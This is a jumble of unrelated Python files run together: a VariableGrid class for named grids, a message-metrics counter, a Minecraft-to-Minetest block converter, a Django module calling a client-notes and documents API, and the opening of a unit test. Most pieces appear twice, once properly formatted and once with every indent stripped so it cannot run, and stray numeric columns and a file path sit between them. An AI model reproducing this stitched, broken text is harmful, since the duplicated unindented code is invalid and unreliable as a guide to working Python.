class VariableGrid(object):
    """
    Class representing an object which can store dimensions of a grid of
    arbitrary dimension, D1, embedded in a space of arbitrary dimension, D2
    (where D2>=D1). Each individual dimension of the smaller grid can traverse
    any finite path through the larger space. Each individual dimension of the
    larger space has a name and all of them must have values in each point of
    the grid on the smaller space.
    """

    @property
    def names(self):
        """
        Property storing the string names of each basis.
        """
        if not hasattr(self, '_names'):
            raise AttributeError("names was referenced before it was set.")
        return self._names

    @names.setter
    def names(self, value):
        """
        Allows user to set names property.

        value: must be sequence of strings
        """
        if type(value) in sequence_types:
            if all([isinstance(element, basestring) for element in value]):
                self._names = value
            else:
                raise TypeError("Not every element of names was a string.")
        else:
            raise TypeError("names was set to a non-sequence.")

    @property
    def dimensions(self):
        """
        Property storing the dimensions of the grids to calculate: a list with
        one dictionary per grid dimension, each mapping variable names to
        their value ranges.
        """
        if not hasattr(self, '_dimensions'):
            raise AttributeError("dimensions was referenced before it was " +
                                 "set somehow.")
        return self._dimensions

    @dimensions.setter
    def dimensions(self, value):
        """
        Setter for the dimensions property.

        value: must be a list (whose length is the number of dimensions of the
               desired grid) whose values are dictionaries (which have, as
               keys, names of the dimensions of the larger space and have, as
               values, numpy.ndarray objects giving dimension's range; note
               that all ranges of each dictionary must be the same length)

        As a side effect, computes self._shape, self._dimensions_by_name,
        self._minima and self._maxima.
        """
        type_error = TypeError("dimensions should be a list of " +
                               "dictionaries of arrays.")
        if type(value) not in sequence_types:
            raise type_error
        self._shape = []
        self._dimensions_by_name = {name: None for name in self.names}
        self._maxima = {name: -np.inf for name in self.names}
        self._minima = {name: np.inf for name in self.names}
        for (idimension, dimension) in enumerate(value):
            if not isinstance(dimension, dict):
                raise type_error
            variable_range_lengths = []
            for name in dimension:
                # Each variable may be varied along only one grid dimension.
                previous_idimension = self._dimensions_by_name[name]
                if type(previous_idimension) is type(None):
                    self._dimensions_by_name[name] = idimension
                else:
                    raise KeyError(("Variable, {0!s}, was given in " +
                                    "both dimension #{1} and dimension " +
                                    "#{2}.").format(name, previous_idimension,
                                                    idimension))
                variable_range = dimension[name]
                if type(variable_range) not in sequence_types:
                    raise type_error
                variable_range = np.array(variable_range)
                if variable_range.ndim != 1:
                    raise type_error
                variable_range_lengths.append(len(variable_range))
                # Track the global extrema of each variable across the grid.
                variable_range_minimum = np.min(variable_range)
                variable_range_maximum = np.max(variable_range)
                if variable_range_minimum < self._minima[name]:
                    self._minima[name] = variable_range_minimum
                if variable_range_maximum > self._maxima[name]:
                    self._maxima[name] = variable_range_maximum
            variable_range_lengths = np.array(variable_range_lengths)
            if np.all(variable_range_lengths == variable_range_lengths[0]):
                self._shape.append(variable_range_lengths[0])
            else:
                raise ValueError("Not all arrays in a given dimension " +
                                 "dictionary were the same length.")
        # Every declared variable must appear in exactly one dimension.
        for name in self._dimensions_by_name:
            if type(self._dimensions_by_name[name]) is type(None):
                raise KeyError("The grid didn't use the variable, '" +
                               name + "'.")
        self._shape = tuple(self._shape)
        self._dimensions = value

    @property
    def dimensions_by_name(self):
        """
        Property storing a dictionary whose keys are the names of variables and
        whose values are the indices of the dimension where the name is varied.
        """
        if not hasattr(self, '_dimensions_by_name'):
            raise AttributeError("dimensions_by_name was referenced before " +
                                 "it was set. This shouldn't happen " +
                                 "because it should be set automatically " +
                                 "when dimensions is set.")
        return self._dimensions_by_name

    @property
    def shape(self):
        """
        Property storing the shape of the grids to calculate.
        """
        if not hasattr(self, '_shape'):
            raise AttributeError("shape was referenced before it was set. " +
                                 "This shouldn't happen because the shape " +
                                 "should be set automatically when " +
                                 "dimensions are set.")
        return self._shape

    @property
    def ndim(self):
        """
        Property storing the number of dimensions in this grid.
        """
        if not hasattr(self, '_ndim'):
            self._ndim = len(self.shape)
        return self._ndim

    def point_from_indices(self, indices):
        """
        Retrieves a given point in the full space from the indices of the grid.

        indices: sequence whose values are the indices of each grid dimension
                 (0<=indices[i]<shape[i] for all 0<=i<ndim)

        returns: dictionary mapping each variable name to its value at the
                 given grid point
        """
        point = {}
        for idimension, dimension in enumerate(self.dimensions):
            index = indices[idimension]
            for name in dimension:
                point[name] = dimension[name][index]
        return point

    @property
    def minima(self):
        """
        Property storing the minimum of each dimension in a dictionary indexed
        by variable name.
        """
        if not hasattr(self, '_minima'):
            raise AttributeError("minima was referenced before it was set. " +
                                 "This shouldn't happen because minima " +
                                 "should be set automatically when " +
                                 "dimensions are set.")
        # Fixed: this previously returned self._maxima, so the minima property
        # silently reported the per-variable maxima.
        return self._minima

    @property
    def maxima(self):
        """
        Property storing the maximum of each dimension in a dictionary indexed
        by variable name.
        """
        if not hasattr(self, '_maxima'):
            raise AttributeError("maxima was referenced before it was set. " +
                                 "This shouldn't happen because maxima " +
                                 "should be set automatically when " +
                                 "dimensions are set.")
        return self._maxima
from distpy import sequence_types
try:
# this runs with no issues in python 2 but raises error in python 3
basestring
except:
# this try/except allows for python 2/3 compatible string type checking
basestring = str
class VariableGrid(object):
"""
Class representing an object which can store dimensions of a grid of
arbitrary dimension, D1, embedded in a space of arbitrary dimension, D2
(where D2>=D1). Each individual dimension of the smaller grid can traverse
any finite path through the larger space. Each individual dimension of the
larger space has a name and all of them must have values in each point of
the grid on the smaller space.
"""
@property
def names(self):
"""
Property storing the string names of each basis.
"""
if not hasattr(self, '_names'):
raise AttributeError("names was referenced before it was set.")
return self._names
@names.setter
def names(self, value):
"""
Allows user to set names property.
value: must be sequence of strings
"""
if type(value) in sequence_types:
if all([isinstance(element, basestring) for element in value]):
self._names = value
else:
raise TypeError("Not every element of names was a string.")
else:
raise TypeError("names was set to a non-sequence.")
@property
def dimensions(self):
"""
Property storing the dimensions of the grids to calculate. It takes the
form of a list of lists of dictionaries containing subsets.
"""
if not hasattr(self, '_dimensions'):
raise AttributeError("dimensions was referenced before it was " +\
"set somehow.")
return self._dimensions
@dimensions.setter
def dimensions(self, value):
"""
Setter for the dimensions property.
value: must be a list (whose length is the number of dimensions of the
desired grid) whose values are dictionaries (which have, as
keys, names of the dimensions of the larger space and have, as
values, numpy.ndarray objects giving dimension's range; note
that all ranges of each dictionary must be the same length)
"""
type_error = TypeError("dimensions should be a list of " +\
"dictionaries of arrays.")
if type(value) in sequence_types:
self._shape = []
self._dimensions_by_name = {name: None for name in self.names}
self._maxima = {name: -np.inf for name in self.names}
self._minima = {name: np.inf for name in self.names}
for (idimension, dimension) in enumerate(value):
if isinstance(dimension, dict):
variable_range_lengths = []
for name in dimension:
previous_idimension = self._dimensions_by_name[name]
if type(previous_idimension) is type(None):
self._dimensions_by_name[name] = idimension
else:
raise KeyError(("Variable, {0!s}, was given in " +\
"both dimension #{1} and dimension " +\
"#{2}.").format(name, previous_idimension,\
idimension))
variable_range = dimension[name]
if type(variable_range) in sequence_types:
variable_range = np.array(variable_range)
if variable_range.ndim != 1:
raise type_error
variable_range_lengths.append(len(variable_range))
variable_range_minimum = np.min(variable_range)
variable_range_maximum = np.max(variable_range)
if variable_range_minimum < self._minima[name]:
self._minima[name] = variable_range_minimum
if variable_range_maximum > self._maxima[name]:
self._maxima[name] = variable_range_maximum
else:
raise type_error
variable_range_lengths = np.array(variable_range_lengths)
if np.all(variable_range_lengths ==\
variable_range_lengths[0]):
self._shape.append(variable_range_lengths[0])
else:
raise ValueError("Not all arrays in a given " +\
"dimension dictionary were the " +\
"same length.")
else:
raise type_error
for name in self._dimensions_by_name:
if type(self._dimensions_by_name[name]) is type(None):
raise KeyError("The grid didn't use the variable, '" +\
name + "'.")
else:
raise type_error
self._shape = tuple(self._shape)
self._dimensions = value
@property
def dimensions_by_name(self):
"""
Property storing a dictionary whose keys are the names of variables and
whose values are the indices of the dimension where the name is varied.
"""
if not hasattr(self, '_dimensions_by_name'):
raise AttributeError("dimensions_by_name was referenced before " +\
"it was set. This shouldn't happen " +\
"because it should be set automatically " +\
"when dimensions is set.")
return self._dimensions_by_name
@property
def shape(self):
"""
Property storing the shape of the grids to calculate.
"""
if not hasattr(self, '_shape'):
raise AttributeError("shape was referenced before it was set. " +\
"This shouldn't happen because the shape " +\
"should be set automatically when " +\
"dimensions are set.")
return self._shape
@property
def ndim(self):
"""
Property storing the number of dimensions in this grid.
"""
if not hasattr(self, '_ndim'):
self._ndim = len(self.shape)
return self._ndim
def point_from_indices(self, indices):
"""
Retrieves a given point in the full space from the indices of the grid.
indices: sequence whose values are the indices of each grid dimension
returns: dictionary whose keys are the names of the variables and the
values are the indices (0<=indices[i]<shape[i] for all
0<=i<ndim) of the grid dimensions
"""
point = {}
for idimension, dimension in enumerate(self.dimensions):
index = indices[idimension]
for name in dimension:
point[name] = dimension[name][index]
return point
@property
def minima(self):
    """
    Property storing the minimum of each dimension in a dictionary indexed
    by variable name.
    """
    if not hasattr(self, '_minima'):
        raise AttributeError("minima was referenced before it was set. " +
                             "This shouldn't happen because minima " +
                             "should be set automatically when " +
                             "dimensions are set.")
    # Fixed: this previously returned self._maxima, so the minima property
    # silently reported the per-variable maxima.
    return self._minima
@property
def maxima(self):
"""
Property storing the maximum of each dimension in a dictionary indexed
by variable name.
"""
if not hasattr(self, '_maxima'):
raise AttributeError("maxima was referenced before it was set. " +\
"This shouldn't happen because maxima " +\
"should be set automatically when " +\
"dimensions are set.")
return self._maxima | 0.786787 | 0.607227 |
import threading
class MessageMetrics:
    """Accumulates message count, byte and handling-time totals for one worker."""

    def __init__(self):
        """Start all counters at zero."""
        self.byte_sum = 0
        self.message_count = 0
        self.message_handle_time = 0

    def increment_message_count(self, message_size, time_taken):
        """Record one handled message of `message_size` bytes taking `time_taken`."""
        self.message_count = self.message_count + 1
        self.byte_sum = self.byte_sum + message_size
        self.message_handle_time = self.message_handle_time + time_taken

    def get_and_reset_metrics(self):
        """Return (count, bytes, time) accumulated so far and zero the counters."""
        snapshot = (self.message_count, self.byte_sum, self.message_handle_time)
        self.message_count = 0
        self.byte_sum = 0
        self.message_handle_time = 0
        return snapshot
class MessageMetricsHandler:
    """Aggregates per-worker MessageMetrics and prints a rolling summary line."""

    def __init__(self, num_handlers, count_drops=False):
        """Create `num_handlers` per-worker accumulators; optionally track drops."""
        self.dropped_messages = 0
        self.dropped_per_period = 0
        self.dropped_lock = threading.Lock()
        self.observed_messages = 0
        self.observed_lock = threading.Lock()
        self.metric_handlers = [MessageMetrics() for _ in range(num_handlers)]
        self.count_drops = count_drops

    def handle_message(self, handler, message_size, time_taken):
        """Record one message against worker slot `handler`."""
        upper = len(self.metric_handlers) - 1
        if not 0 <= handler <= upper:
            raise ValueError(f"Handler must be between 0 and {len(self.metric_handlers) - 1}")
        self.metric_handlers[handler].increment_message_count(message_size, time_taken)

    def publish_metrics(self):
        """Print a one-line summary of the period's totals and reset them."""
        # (message_count, byte_sum, time_taken) per worker; reading resets each.
        vals = [worker.get_and_reset_metrics() for worker in self.metric_handlers]
        # Column-wise totals: [messages, bytes, handling time].
        sums = [sum(column) for column in zip(*vals)]
        if sums[0] == 0:
            handle_time = 0
        else:
            handle_time = sums[2] / sums[0]
        if self.count_drops:
            message = f"m/s observed: {self.observed_messages}. m/s:{sums[0]}. d:{self.dropped_messages} d/s:{self.dropped_per_period} KB/s:{(sums[1] / 1024):.2f}. t/s:{handle_time:.2f}"
            print(message.ljust(len(message)+20), end='')
            print("\r", end='')
            with self.dropped_lock:
                self.dropped_per_period = 0
        else:
            message = f"m/s observed: {self.observed_messages}. m/s sent:{sums[0]}. KB/s:{(sums[1] / 1024):.2f}. t/m/s:{handle_time:.2f}"
            print(message.ljust(len(message)+20), end='')
            print("\r", end='')
        # Lock only once per publish period when resetting the observed count.
        with self.observed_lock:
            self.observed_messages = 0

    def increment_dropped(self):
        """Count one dropped message (no-op unless drop counting is enabled)."""
        if not self.count_drops:
            return
        with self.dropped_lock:
            self.dropped_messages += 1
            self.dropped_per_period += 1

    def increment_observed(self):
        # Deliberately lock-free: a slightly stale count is acceptable on the
        # hot path.
        self.observed_messages += 1
class MessageMetrics:
    """Accumulates message count, byte and handling-time totals for one worker."""
    def __init__(self):
        """Start all counters at zero."""
        self.byte_sum = 0
        self.message_count = 0
        self.message_handle_time = 0
    def increment_message_count(self, message_size, time_taken):
        # Record one handled message of `message_size` bytes taking `time_taken`.
        self.message_count += 1
        self.byte_sum += message_size
        self.message_handle_time += time_taken
    def get_and_reset_metrics(self):
        # Return (count, bytes, time) accumulated so far and zero the counters.
        m_count = self.message_count
        b_sum = self.byte_sum
        t_taken = self.message_handle_time
        self.message_count = 0
        self.byte_sum = 0
        self.message_handle_time = 0
        return (m_count, b_sum, t_taken)
class MessageMetricsHandler:
def __init__(self, num_handlers, count_drops=False):
""" """
self.dropped_messages = 0
self.dropped_per_period = 0
self.dropped_lock = threading.Lock()
self.observed_messages = 0
self.observed_lock = threading.Lock()
self.metric_handlers = []
self.count_drops = count_drops
for i in range(num_handlers):
self.metric_handlers.append(MessageMetrics())
def handle_message(self, handler, message_size, time_taken):
if handler > len(self.metric_handlers) - 1 or handler < 0:
raise ValueError(f"Handler must be between 0 and {len(self.metric_handlers) - 1}")
self.metric_handlers[handler].increment_message_count(message_size, time_taken)
def publish_metrics(self):
""" """
# list of tuples (message_count, byte_sum, time_taken) for each worker
vals = [m.get_and_reset_metrics() for m in self.metric_handlers]
# summed tuple, [sum(message_count), sum(byte_sum), sum(time_taken)]
sums = [sum(x) for x in zip(*vals)]
handle_time = 0 if sums[0] == 0 else sums[2]/sums[0]
if self.count_drops:
message = f"m/s observed: {self.observed_messages}. m/s:{sums[0]}. d:{self.dropped_messages} d/s:{self.dropped_per_period} KB/s:{(sums[1] / 1024):.2f}. t/s:{handle_time:.2f}"
print(message.ljust(len(message)+20), end='')
print("\r", end='')
with self.dropped_lock:
self.dropped_per_period = 0
else:
message = f"m/s observed: {self.observed_messages}. m/s sent:{sums[0]}. KB/s:{(sums[1] / 1024):.2f}. t/m/s:{handle_time:.2f}"
print(message.ljust(len(message)+20), end='')
print("\r", end='')
# only lock once per publish period to ensure we reset observed
with self.observed_lock:
self.observed_messages = 0
def increment_dropped(self):
# shouldn't be calling this if we haven't enabled drop counters
if self.count_drops:
with self.dropped_lock:
self.dropped_messages += 1
self.dropped_per_period += 1
def increment_observed(self):
# to not put a lock in hot path, observed messages is not thread safe on increment
self.observed_messages += 1 | 0.659953 | 0.198064 |
import os,json
from .block_functions import *
# Logging switches: emit a line for each successfully converted / unmatched
# block id respectively.
report_known_blocks = False
report_unknown_blocks = True
# When True, blocks with no conversion rule become air instead of a
# placeholder "mc2mt:<id>" node.
unknown_as_air = False
# Cache of already-converted blocks, keyed by str_block() signature.
converted_blocks = {}
# Mod registry: definitions by name, sorted (priority, name) pairs, and
# per-mod enabled flags.
mods_available = {}
mods_priority = []
mods_enabled = {}
def str_mod(name):
    """Render a human-readable summary (header, description, download link)
    of the registered mod called `name`."""
    mod = mods_available[name]
    author = mod['author']
    description = mod['description']
    download = mod['download']
    return f"[ {name} ] by {author}\n\t{description}\n\t{download}"
def load_mod(mod_file):
    """Load one JSON mod definition into the module-level registries.

    Non-.json paths are ignored. Missing fields fall back to the defaults
    below; a malformed JSON file prints the parse error and exits the
    process.
    """
    if mod_file[-5:] != '.json': return
    # Defaults for every field a mod file may omit.
    mod = {
        'name': 'unknown',
        'author': 'anonymous',
        'description': 'No description provided.',
        'download': 'No download provided.',
        'enabled': True,
        'priority': 0,
        'table': {},
    }
    with open(mod_file) as json_file:
        try:
            load = json.load(json_file)
        except json.decoder.JSONDecodeError as e:
            print("Error in mod:",mod_file)
            print(e)
            exit(1)
    mod.update(load)
    # Register the mod under its (possibly defaulted) name.
    mods_available[mod['name']] = mod
    mods_enabled[mod['name']] = mod['enabled']
    mods_priority.append((mod['priority'],mod['name']))
    # Keep priority order sorted so convert_block consults mods low-to-high.
    mods_priority.sort()
def load_mods_from_path():
    """Load every mod definition bundled in this package's `mods` directory."""
    mod_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "mods")
    for entry in os.listdir(mod_path):
        load_mod(os.path.join(mod_path, entry))
def find_in_table(table, key):
    """Resolve `key` against a conversion table, allowing '?' wildcards.

    Tries, in order: an exact match, prefix wildcards ('oak?' matches
    'oak_log'), then suffix wildcards ('?log' matches 'birch_log').
    Returns the matching table key, or None when nothing matches.
    """
    if key in table:
        return key
    parts = key.split("_")
    part_total = len(parts)
    for split_at in range(1, part_total):
        candidate = "_".join(parts[:split_at]) + "?"
        if candidate in table:
            return candidate
    for split_at in range(1, part_total):
        candidate = "?" + "_".join(parts[split_at:])
        if candidate in table:
            return candidate
    return None
def get_from_table(table,block):
    """Look up `block` in a mod conversion table and resolve its parameters.

    Returns a (param0, param1, param2) tuple, or None when the table has no
    (possibly wildcarded) entry for the block id. String parameters starting
    with "@" name a converter function -- presumably provided by the
    `block_functions` star import -- that is resolved via globals() and
    called with the block to compute the value.
    """
    key = find_in_table(table,block.id)
    if not key: return
    param0,param1,param2 = table[key]
    try:
        # "@name" parameters dispatch to a converter function by name.
        if type(param0)==str and param0[0]=="@":
            param0 = (globals()[param0[1:]])(block)
        if type(param1)==str and param1[0]=="@":
            param1 = (globals()[param1[1:]])(block)
        if type(param2)==str and param2[0]=="@":
            param2 = (globals()[param2[1:]])(block)
    except Exception as e:
        # Report which block broke the converter before re-raising.
        print_block("ERROR",block)
        raise e
    return param0,param1,param2
def convert_block(block):
    """Convert a source block to a (node_name, param1, param2) tuple.

    Results are memoized in `converted_blocks`. Enabled mods are consulted in
    ascending priority order; the first table that matches wins. Unmatched
    blocks become air or an "mc2mt:<id>" placeholder depending on
    `unknown_as_air`.
    """
    # Get conversion from cache
    if block.id == "air": return ("air",15,0)
    if str_block(block) in converted_blocks:
        return converted_blocks[str_block(block)]
    # Get conversion from mod
    for priority,mod_name in mods_priority:
        if not mods_enabled[mod_name]: continue
        mod_table = mods_available[mod_name]['table']
        converted = get_from_table(mod_table,block)
        if converted:
            converted_blocks[str_block(block)] = converted
            if report_known_blocks: print_block("ConvertedBlock",block)
            return converted
    # Unknown block
    if unknown_as_air: converted = ("air",15,0)
    else: converted = (f"mc2mt:{block.id}",0,0)
    converted_blocks[str_block(block)] = converted
    if report_unknown_blocks: print_block("UnknownBlock",block)
    return converted
def print_block(prefix, block):
    """Log a block's canonical signature with a category prefix."""
    signature = str_block(block)
    print(prefix, signature, sep="~")
def str_block(block):
    """Return a canonical one-line signature for a block:
    "<id>~{'prop':'value', ...}" with properties sorted by name, or
    "<id>~{ }" when the block has no properties."""
    if block.properties == {}:
        return str(block.id) + "~{ }"
    property_parts = [
        "'" + str(key) + "':'" + str(block.properties[key]) + "'"
        for key in sorted(block.properties.keys())
    ]
    return str(block.id) + "~{" + ", ".join(property_parts) + "}"
from .block_functions import *
report_known_blocks = False
report_unknown_blocks = True
unknown_as_air = False
converted_blocks = {}
mods_available = {}
mods_priority = []
mods_enabled = {}
def str_mod(name):
author = mods_available[name]['author']
download = mods_available[name]['download']
description = mods_available[name]['description']
return f"[ {name} ] by {author}\n\t{description}\n\t{download}"
def load_mod(mod_file):
if mod_file[-5:] != '.json': return
mod = {
'name': 'unknown',
'author': 'anonymous',
'description': 'No description provided.',
'download': 'No download provided.',
'enabled': True,
'priority': 0,
'table': {},
}
with open(mod_file) as json_file:
try:
load = json.load(json_file)
except json.decoder.JSONDecodeError as e:
print("Error in mod:",mod_file)
print(e)
exit(1)
mod.update(load)
mods_available[mod['name']] = mod
mods_enabled[mod['name']] = mod['enabled']
mods_priority.append((mod['priority'],mod['name']))
mods_priority.sort()
def load_mods_from_path():
mod_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),"mods")
for mod_filename in os.listdir(mod_path):
load_mod(os.path.join(mod_path,mod_filename))
def find_in_table(table,key):
if key in table: return key
parts = key.split("_")
for i in range(1,len(parts)):
key_part = ("_".join(parts[:i]))+"?"
if key_part in table: return key_part
for i in range(1,len(parts)):
key_part = "?"+("_".join(parts[i:]))
if key_part in table: return key_part
def get_from_table(table,block):
key = find_in_table(table,block.id)
if not key: return
param0,param1,param2 = table[key]
try:
if type(param0)==str and param0[0]=="@":
param0 = (globals()[param0[1:]])(block)
if type(param1)==str and param1[0]=="@":
param1 = (globals()[param1[1:]])(block)
if type(param2)==str and param2[0]=="@":
param2 = (globals()[param2[1:]])(block)
except Exception as e:
print_block("ERROR",block)
raise e
return param0,param1,param2
def convert_block(block):
# Get conversion from cache
if block.id == "air": return ("air",15,0)
if str_block(block) in converted_blocks:
return converted_blocks[str_block(block)]
# Get conversion from mod
for priority,mod_name in mods_priority:
if not mods_enabled[mod_name]: continue
mod_table = mods_available[mod_name]['table']
converted = get_from_table(mod_table,block)
if converted:
converted_blocks[str_block(block)] = converted
if report_known_blocks: print_block("ConvertedBlock",block)
return converted
# Unknown block
if unknown_as_air: converted = ("air",15,0)
else: converted = (f"mc2mt:{block.id}",0,0)
converted_blocks[str_block(block)] = converted
if report_unknown_blocks: print_block("UnknownBlock",block)
return converted
def print_block(prefix,block):
print(prefix,str_block(block),sep="~")
def str_block(block):
string = str(block.id) + "~{"
if block.properties == {}:
return string + " }"
for p in sorted(block.properties.keys()):
string += "'" + str(p) + "':'" + str(block.properties[p]) + "', "
return string[:-2] + "}" | 0.158077 | 0.111773 |
import requests
from django.shortcuts import render
# ****************************** GET ********************************
# get the list of all events of a client
def getEvents(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<clientId>/
response = requests.get(url+clientId)
events = response.json()
# extract the events of the list object called "events" in the JSON file
events_list = {'events': events['events']}
return events_list
# get the client profile
def getProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/profile
response = requests.get(url+clientId+'/profile')
userProfile = response.json()
return userProfile
# get the investment profile
def getInvestmentProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/investmentProfile
response = requests.get(url+clientId+'/investmentProfile')
invProfile = response.json()
return invProfile
# get an event
def getEvent(request, eventId):
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+eventId)
evt = response.json()
return evt
# get the list of all notes of a client
def getNotes(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<clientId>/
response = requests.get(url+clientId)
ns = response.json()
# extract the notes of the list object called "notes" in the JSON file
notes_list = {'notes': ns['notes']}
return notes_list
# get the list of all notes of an event
def getNotesByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<eventId>/
response = requests.get(url+eventId)
ns = response.json()
notes_list = {'notes': ns['notes']}
return notes_list
# get a note
def getNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+noteId)
nt = response.json()
return nt
# get the list of all documents of a client
def getDocuments(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<clientId>/
response = requests.get(url+clientId)
docs = response.json()
# extract the documents of the list object called "documents" in the JSON file
docs_list = {'docs': docs['docs']}
return docs_list
# get the list of all documents of an event
def getDocumentsByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<eventId>/
response = requests.get(url+eventId)
docs = response.json()
docs_list = {'docs': docs['docs']}
return docs_list
# get a document
def getDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<documentId>/
response = requests.get(url+documentId)
doc = response.json()
return doc
# ****************************** POST ********************************
def postNote(request, json):
url = 'https://hzmEndpoint.ch/notes/'
# json would be filled by form data
"""
json = {'clientId': "123",
"consultationId": "123-3456-3454-1",
"title": "Neue Notiz",
"evtCreated": "2021-01-17 10:00",
"evtModified": "2021-01-21 10:00",
"evtDue": "2021-05-17",
"reminder": True,
"textHtml": "Dies ist eine neue Notiz" } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, note stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def postDocument(request, json):
url = 'https://hzmEndpoint.ch/documents/'
# json would filled by form data / upload
"""
json = {"clientId": 012342223,
"consultationId": "123-3456-3454-1",
"title": "Risikoaufklärung 2.0",
"evtCreated": "2021-01-17 10:00",
"format": "pdf",
"status": "Neu",
"pdfResource":PDF resource } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, document stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
# ****************************** DELETE ********************************
def deleteNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/' + noteId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def deleteDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/' + documentId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text)) | app/services.py | import requests
from django.shortcuts import render
# ****************************** GET ********************************
# get the list of all events of a client
def getEvents(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<clientId>/
response = requests.get(url+clientId)
events = response.json()
# extract the events of the list object called "events" in the JSON file
events_list = {'events': events['events']}
return events_list
# get the client profile
def getProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/profile
response = requests.get(url+clientId+'/profile')
userProfile = response.json()
return userProfile
# get the investment profile
def getInvestmentProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/investmentProfile
response = requests.get(url+clientId+'/investmentProfile')
invProfile = response.json()
return invProfile
# get an event
def getEvent(request, eventId):
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+eventId)
evt = response.json()
return evt
# get the list of all notes of a client
def getNotes(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<clientId>/
response = requests.get(url+clientId)
ns = response.json()
# extract the notes of the list object called "notes" in the JSON file
notes_list = {'notes': ns['notes']}
return notes_list
# get the list of all notes of an event
def getNotesByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<eventId>/
response = requests.get(url+eventId)
ns = response.json()
notes_list = {'notes': ns['notes']}
return notes_list
# get a note
def getNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+noteId)
nt = response.json()
return nt
# get the list of all documents of a client
def getDocuments(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<clientId>/
response = requests.get(url+clientId)
docs = response.json()
# extract the documents of the list object called "documents" in the JSON file
docs_list = {'docs': docs['docs']}
return docs_list
# get the list of all documents of an event
def getDocumentsByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<eventId>/
response = requests.get(url+eventId)
docs = response.json()
docs_list = {'docs': docs['docs']}
return docs_list
# get a document
def getDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<documentId>/
response = requests.get(url+documentId)
doc = response.json()
return doc
# ****************************** POST ********************************
def postNote(request, json):
url = 'https://hzmEndpoint.ch/notes/'
# json would be filled by form data
"""
json = {'clientId': "123",
"consultationId": "123-3456-3454-1",
"title": "Neue Notiz",
"evtCreated": "2021-01-17 10:00",
"evtModified": "2021-01-21 10:00",
"evtDue": "2021-05-17",
"reminder": True,
"textHtml": "Dies ist eine neue Notiz" } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, note stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def postDocument(request, json):
url = 'https://hzmEndpoint.ch/documents/'
# json would filled by form data / upload
"""
json = {"clientId": 012342223,
"consultationId": "123-3456-3454-1",
"title": "Risikoaufklärung 2.0",
"evtCreated": "2021-01-17 10:00",
"format": "pdf",
"status": "Neu",
"pdfResource":PDF resource } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, document stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
# ****************************** DELETE ********************************
def deleteNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/' + noteId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def deleteDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/' + documentId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text)) | 0.393735 | 0.133021 |
from datetime import datetime
from io import BytesIO
import json
import os
from unittest import TestCase
from unittest.mock import ANY, patch
import boto3
from botocore import UNSIGNED
from botocore.client import Config
from botocore.stub import Stubber
import responses
from .. import index
class MockContext():
def get_remaining_time_in_millis(self):
return 30000
class TestIndex(TestCase):
def setUp(self):
self.requests_mock = responses.RequestsMock(assert_all_requests_are_fired=False)
self.requests_mock.start()
# Create a dummy S3 client that (hopefully) can't do anything.
self.s3_client = boto3.client('s3', config=Config(signature_version=UNSIGNED))
